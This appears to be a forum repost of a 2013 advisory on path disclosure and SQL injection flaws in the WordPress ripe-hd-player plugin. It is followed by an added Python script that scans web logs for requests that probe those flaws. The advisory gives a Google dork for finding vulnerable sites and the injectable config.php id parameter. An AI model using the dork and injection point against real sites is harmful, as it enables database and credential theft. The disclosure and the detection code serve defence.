Praetorian503
Posted January 21, 2013

The WordPress Ripe HD FLV player plugin suffers from path disclosure and remote SQL injection vulnerabilities.

-------------------------------------------------------------------
WordPress plugins - ripe-hd-player FD/SQL Injection Vulnerability
-------------------------------------------------------------------

# Vendor: http://www.hitasoft.com/products.php
#####
# Author => Zikou-16
# E-mail => zikou16x@gmail.com
# Facebook => http://fb.me/Zikou.se
# Google Dork => inurl:"/wp-content/plugins/ripe-hd-player/"
# Tested on : Windows 7 , Backtrack 5r3
####

#=> Exploit Info :
------------------
# The attacker can access the database & get username & password ....... & disclose the Full Path
------------------

#=> Exploit :
------------------
1#=> Full Path Disclosure :
http://[target]/[path]/wp-content/plugins/ripe-hd-player/index.php
http://[target]/[path]/wp-content/plugins/ripe-hd-player/installer.php
-------
2#=> SQL Injection
http://[target]/[path]/wp-content/plugins/ripe-hd-player/config.php?id=2'[inj3ct h3re]
------------------------------ <= Th3 End '

Source: PacketStorm
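
For site owners checking whether the three plugin scripts named in the advisory have been requested, the following is an added example (not part of the original post or the PacketStorm advisory) that scans web server access logs for direct hits on index.php and installer.php and for config.php requests whose id parameter is not a plain integer. It assumes combined-format access logs; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

PLUGIN_DIR = "/wp-content/plugins/ripe-hd-player/"
DISCLOSURE_SCRIPTS = {"index.php", "installer.php"}  # path disclosure per the advisory
SQLI_SCRIPT = "config.php"                           # id parameter per the advisory

# Client IP and request target of a combined-format log line (assumed format).
REQUEST_RE = re.compile(r'^(?P<ip>\S+) [^"]*"[A-Z]+ (?P<target>\S+) HTTP/[0-9.]+"')

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [21/Jan/2013:10:00:01 +0000] "GET /blog/wp-content/plugins/ripe-hd-player/config.php?id=2 HTTP/1.1" 200 512',
    '198.51.100.7 - - [21/Jan/2013:10:00:05 +0000] "GET /blog/wp-content/plugins/ripe-hd-player/config.php?id=2%27 HTTP/1.1" 200 731',
    '198.51.100.7 - - [21/Jan/2013:10:00:09 +0000] "GET /blog/wp-content/plugins/ripe-hd-player/installer.php HTTP/1.1" 200 1203',
    '203.0.113.4 - - [21/Jan/2013:10:01:00 +0000] "GET /blog/wp-login.php HTTP/1.1" 200 2048',
]

def classify(line):
    """Return (ip, finding) if the line is a suspicious plugin request, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    path = unquote(url.path).lower()          # decode %xx so encoded paths still match
    idx = path.find(PLUGIN_DIR)
    if idx < 0:
        return None
    script = path[idx + len(PLUGIN_DIR):]
    if script in DISCLOSURE_SCRIPTS:
        return (m.group("ip"), "direct-access:" + script)
    if script == SQLI_SCRIPT:
        # parse_qs percent-decodes values, so ' and %27 are treated alike.
        ids = parse_qs(url.query, keep_blank_values=True).get("id", [])
        if any(not re.fullmatch(r"[0-9]+", v) for v in ids):
            return (m.group("ip"), "non-numeric-id:" + script)
    return None

def scan(lines):
    """Collect findings for every suspicious line in an iterable of log lines."""
    return [f for f in (classify(l) for l in lines) if f is not None]

if __name__ == "__main__":
    for ip, finding in scan(SAMPLE_LOG):
        print(ip, finding)
```
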